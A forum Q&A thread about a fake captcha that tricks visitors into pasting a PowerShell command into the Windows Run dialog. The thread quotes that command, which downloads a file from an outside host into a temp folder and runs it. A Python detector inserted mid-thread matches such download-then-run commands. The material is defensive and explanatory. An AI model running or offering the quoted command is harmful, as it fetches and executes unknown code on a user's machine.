I recently encountered a strange situation that seems like a phishing tactic. I visited a website, and it asked me to complete a "Prove you are human" Captcha with these steps: 1. Press Windows + R to open the Run command, 2. Press Control + V to paste something, and 3. Hit Enter. I didn't want to execute anything from that site, so I pasted the clipboard contents into a Notes document first. It turned out to be a PowerShell command: "powershell -NoProfile -Command 'wget 'https://nbdni.com/iks.php' -OutFile '%TEMP%cmd.cmd'; start '%TEMP%cmd.cmd';". I'm curious—what exactly would this have done to my computer?
3 Answers
Right now, that URL is just returning a 403 error, meaning access is denied. It’s possible they limit access based on things like the user agent. So, you may be lucky they weren't serving anything dangerous at the moment!
This script would have done a couple of things: first, it would have used 'wget' to download whatever is hosted at that URL into a temporary command file. Then, it would have run that command file, which could potentially execute harmful actions on your PC. It’s definitely not safe!
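The download-then-run shape described in the answer above can be recognized mechanically. The following Python heuristic is an added example, not part of the original thread; the sample commands and the example.invalid URLs are constructed, and the alias lists are a starting set, not complete coverage.

```python
import re

# wget, curl and iwr are Invoke-WebRequest aliases in Windows PowerShell 5.1.
DOWNLOAD = r"(?<![\w-])(?:wget|curl|iwr|Invoke-WebRequest)\s+['\"]?(https?://[^\s'\";]+)"
# One argument: single-quoted, double-quoted, or bare up to whitespace or ';'.
ARG = r"(?:'([^']*)'|\"([^\"]*)\"|([^\s;'\"]+))"
OUTFILE = r"-OutFile\s+" + ARG
# start and saps are Start-Process aliases, ii is Invoke-Item, & is the call operator.
LAUNCH = r"(?:(?<![\w-])(?:start|saps|Start-Process|Invoke-Item|ii)\s+|&\s*)" + ARG

# Constructed samples: the first has the shape of the command in the question.
SUSPICIOUS = ("powershell -NoProfile -Command 'wget 'https://example.invalid/payload.php' "
              "-OutFile '%TEMP%cmd.cmd'; start '%TEMP%cmd.cmd';")
BENIGN = ("powershell -NoProfile -Command iwr 'https://example.invalid/report.csv' "
          "-OutFile 'C:\\Reports\\report.csv'")


def _arg(match):
    """Return whichever of the three ARG alternatives matched."""
    return next(g for g in match.groups() if g is not None)


def analyze(cmdline):
    """Describe what a pasted Run-dialog command would fetch, write and start."""
    result = {"powershell": False, "url": None, "outfile": None, "runs_download": False}
    result["powershell"] = bool(
        re.search(r"(?<![\w-])(?:powershell|pwsh)(?:\.exe)?\b", cmdline, re.I))
    dl = re.search(DOWNLOAD, cmdline, re.I)
    out = re.search(OUTFILE, cmdline, re.I)
    if dl:
        result["url"] = dl.group(1)
    if out:
        result["outfile"] = _arg(out)
        # Only look for a launcher after the point where the file is written.
        for launch in re.finditer(LAUNCH, cmdline[out.end():], re.I):
            if _arg(launch).lower() == result["outfile"].lower():
                result["runs_download"] = True
    return result


def is_download_and_run(cmdline):
    """True when PowerShell fetches a URL to a file and then starts that same file."""
    r = analyze(cmdline)
    return bool(r["powershell"] and r["url"] and r["runs_download"])


if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(is_download_and_run(sample), analyze(sample))
```

A match is a triage signal for clipboard contents or process command-line logs, not a verdict on what the downloaded file does.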
It's crazy how some sites trick you into running scripts like that. Out of curiosity, how did you end up on a site that asks for these kinds of commands?
That makes sense! The error type suggests it might depend on how the request is made. Sounds like it could be rotating or based on client info!